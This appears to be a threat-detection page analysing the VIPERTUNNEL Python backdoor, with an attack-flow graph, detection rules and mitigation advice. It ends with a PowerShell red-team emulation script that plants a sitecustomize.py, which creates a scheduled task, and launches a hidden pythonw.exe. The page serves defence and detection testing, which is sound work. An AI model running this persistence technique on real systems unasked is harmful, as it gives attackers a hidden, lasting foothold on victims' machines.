Follow 
Summary
The report details the analysis of VIPERTUNNEL, a Python based backdoor that achieves persistence via a scheduled task and leverages a malicious sitecustomize.py to load an obfuscated DLL. The DLL decrypts and executes a multi‑stage payload that establishes a SOCKS5 proxy to a hard‑coded C2 server over port 443. The infrastructure is linked to UNC2165 and EvilCorp and shares obfuscation techniques with the ShadowCoil credential‑stealer.
Investigation
Researchers examined Autoruns output, identified the scheduled task 523135538, and traced execution to C:ProgramDatacp49spythonw.exe and its sitecustomize.py module. Reverse engineering of b5yogiiy3c.dll revealed layered obfuscation, decryption routines, and a final stage that creates a SOCKS5 tunnel using hard‑coded credentials. Infrastructure analysis linked multiple domains and IPs to the campaign and highlighted the use of the Pyramid C2 framework.
Mitigation
Deploy endpoint detection that monitors for pythonw.exe execution without arguments, creation of scheduled tasks with numeric names, and the presence of sitecustomize.py in unexpected locations. Block outbound traffic to known C2 domains and ports 443/8000 with anomalous HTTP 401 responses. Implement strict application control to prevent unauthorized Python modules from loading.
Response
Alert on the creation of the suspicious scheduled task and the execution of pythonw.exe without a script. Quarantine affected hosts, collect memory dumps, and hunt for the characteristic class names and hard‑coded credentials. Invalidate the compromised credentials and disrupt the C2 infrastructure identified in the report.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef process fill:#c2f0c2 classDef tool fill:#ffeb99 classDef file fill:#d9d9d9 classDef component fill:#cce5ff classDef c2 fill:#f4b084 classDef credential fill:#ffe6e6 %% Technique nodes tech_persistence["<b>Technique</b> – T1053.005 Scheduled Task : Persistence<br/><b>Description</b>: Creates or modifies a scheduled task to execute malicious code at system boot or on a schedule."] class tech_persistence technique tech_obfuscation["<b>Technique</b> – T1027 Obfuscated Files or Information<br/><b>Description</b>: Uses encoding, compression and cryptographic primitives to hide malicious code."] class tech_obfuscation technique tech_deobfuscate["<b>Technique</b> – T1140 Deobfuscate/Decode Files or Information<br/><b>Description</b>: Decodes Base85 and other transformations to recover nextu2011stage code."] class tech_deobfuscate technique tech_compile["<b>Technique</b> – T1027.004 Compile After Delivery<br/><b>Description</b>: Compiles recovered code in memory using compile() and exec()."] class tech_compile technique tech_reflect["<b>Technique</b> – T1620 Reflective Code Loading<br/><b>Description</b>: Loads and runs code directly from memory without writing to disk."] class tech_reflect technique tech_proxy_ext["<b>Technique</b> – T1090.002 Proxy External Proxy<br/><b>Description</b>: Establishes an external SOCKS5 proxy to forward traffic."] class tech_proxy_ext technique tech_proxy_int["<b>Technique</b> – T1090.001 Proxy Internal Proxy<br/><b>Description</b>: Uses internal proxy components to relay traffic."] class tech_proxy_int technique tech_tunnel["<b>Technique</b> – T1572 Protocol Tunneling<br/><b>Description</b>: Encapsulates victim traffic inside SOCKS5 tunnel."] class tech_tunnel technique tech_encrypted["<b>Technique</b> – T1573 Encrypted Channel<br/><b>Description</b>: Encrypts C2 communication with ChaCha20/XOR."] class tech_encrypted technique tech_webc2["<b>Technique</b> – T1102 Web Service<br/><b>Description</b>: Communicates with C2 over HTTPS using custom Pyramid service."] class tech_webc2 technique tech_nonstd["<b>Technique</b> – T1571 Nonu2011Standard Port<br/><b>Description</b>: Uses port 443 to blend with legitimate HTTPS traffic."] class tech_nonstd technique %% Process and tool nodes process_task["<b>Process</b> – Scheduled Task 523135538<br/><b>Command</b>: C:\ProgramData\cp49s\pythonw.exe"] class process_task process tool_pythonw["<b>Tool</b> – pythonw.exe<br/><b>Role</b>: Executes Python scripts without a console window."] class tool_pythonw tool %% File nodes file_sitecustomize["<b>File</b> – sitecustomize.py<br/><b>Purpose</b>: Autou2011imports and triggers DLL execution."] class file_sitecustomize file file_dll["<b>File</b> – b5yogiiy3c.dll<br/><b>Type</b>: Obfuscated Python payload."] class file_dll file %% Component nodes component_wire["<b>Component</b> – Wire class<br/><b>Function</b>: Implements SOCKS5 client."] class component_wire component component_relay["<b>Component</b> – Relay class<br/><b>Function</b>: Handles traffic forwarding."] class component_relay component component_commander["<b>Component</b> – Commander class<br/><b>Function</b>: Manages C2 commands."] class component_commander component %% C2 and credential nodes c2_server["<b>C2 Server</b> – Pyramid service<br/><b>Response</b>: HTTP 401 Basic realm=Proxy"] class c2_server c2 credentials["<b>Credentials</b> – AnyUser / AnyPassword<br/><b>Use</b>: Authenticates with proxy."] class credentials credential %% Connections tech_persistence –>|creates| process_task process_task –>|launches| tool_pythonw tool_pythonw –>|imports| file_sitecustomize file_sitecustomize –>|loads| file_dll file_dll –>|uses| tech_obfuscation file_dll –>|triggers| tech_deobfuscate tech_deobfuscate –>|leads to| tech_compile tech_compile –>|leads to| tech_reflect tech_reflect –>|executes| component_wire component_wire –>|works with| component_relay component_relay –>|controls| component_commander component_commander –>|contacts| c2_server c2_server –>|uses| tech_proxy_ext c2_server –>|uses| tech_proxy_int c2_server –>|tunnels via| tech_tunnel c2_server –>|encrypts channel| tech_encrypted c2_server –>|communicates over| tech_webc2 c2_server –>|uses port| tech_nonstd component_commander –>|auth with| credentials %% Apply classes class tech_persistence,tech_obfuscation,tech_deobfuscate,tech_compile,tech_reflect,tech_proxy_ext,tech_proxy_int,tech_tunnel,tech_encrypted,tech_webc2,tech_nonstd technique class process_task process class tool_pythonw tool class file_sitecustomize,file_dll file class component_wire,component_relay,component_commander component class c2_server c2 class credentials credential "
Attack Flow
Detections
Python Execution from Suspicious Folders (via cmdline)
View
Suspicious Scheduled Task (via audit)
View
IOCs (SourceIP) to detect: Slithering Through the Noise – Deep Dive into the VIPERTUNNEL Python Backdoor Part 2
View
IOCs (SourceIP) to detect: Slithering Through the Noise – Deep Dive into the VIPERTUNNEL Python Backdoor Part 1
View
IOCs (DestinationIP) to detect: Slithering Through the Noise – Deep Dive into the VIPERTUNNEL Python Backdoor Part 2
View
IOCs (DestinationIP) to detect: Slithering Through the Noise – Deep Dive into the VIPERTUNNEL Python Backdoor Part 1
View
Suspicious Execution of Python for Persistence via sitecustomize.py [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The adversary first drops a malicious
sitecustomize.pyinto the same directory aspythonw.exe. Python automatically importssitecustomize.pyon interpreter start‑up, allowing the attacker to execute arbitrary code without passing a script path on the command line. By launchingpythonw.exewithout any arguments, the process creation event contains an emptyCommandLinefield, satisfying the Sigma rule’s conditions. The payload establishes a scheduled task for persistence, ensuring the interpreter runs at system startup, thereby maintaining long‑term foothold. -
Regression Test Script:
# ------------------------------------------------- # Setup malicious sitecustomize.py # ------------------------------------------------- $payloadPath = 'C:ProgramDatacp49ssitecustomize.py' $exePath = 'C:ProgramDatacp49spythonw.exe' # Ensure the target folder exists New-Item -ItemType Directory -Path (Split-Path $exePath) -Force | Out-Null # Deploy a benign copy of pythonw.exe for the test (if not already present) # In a real red‑team scenario this would be the legitimate interpreter if (-Not (Test-Path $exePath)) { # Copy from system Python installation (adjust path as needed) Copy-Item 'C:Python39pythonw.exe' $exePath } # Create malicious sitecustomize.py (creates a scheduled task as proof‑of‑concept) @" import subprocess, sys # Create a scheduled task that runs pythonw.exe every minute (persistence) subprocess.run(['schtasks', '/Create', '/SC', 'MINUTE', '/MO', '1', '/TN', 'UpdateTask', '/TR', sys.executable]) "@ | Set-Content -Path $payloadPath -Encoding UTF8 # ------------------------------------------------- # Trigger the detection (malicious execution) # ------------------------------------------------- Write-Host '[+] Launching pythonw.exe with empty command line...' Start-Process -FilePath $exePath -ArgumentList '' -WindowStyle Hidden # Wait a short period for the scheduled task to be created (optional) Start-Sleep -Seconds 5 Write-Host '[+] Payload executed. Check your SIEM for the alert.' # ------------------------------------------------- # End of script # ------------------------------------------------- -
Cleanup Commands:
# Remove the malicious sitecustomize.py Remove-Item -Path 'C:ProgramDatacp49ssitecustomize.py' -Force -ErrorAction SilentlyContinue # Delete the scheduled task created by the payload schtasks /Delete /TN UpdateTask /F # Optionally remove the copied pythonw.exe (if it was a test copy) # Remove-Item -Path 'C:ProgramDatacp49spythonw.exe' -Force Write-Host '[+] Cleanup complete.'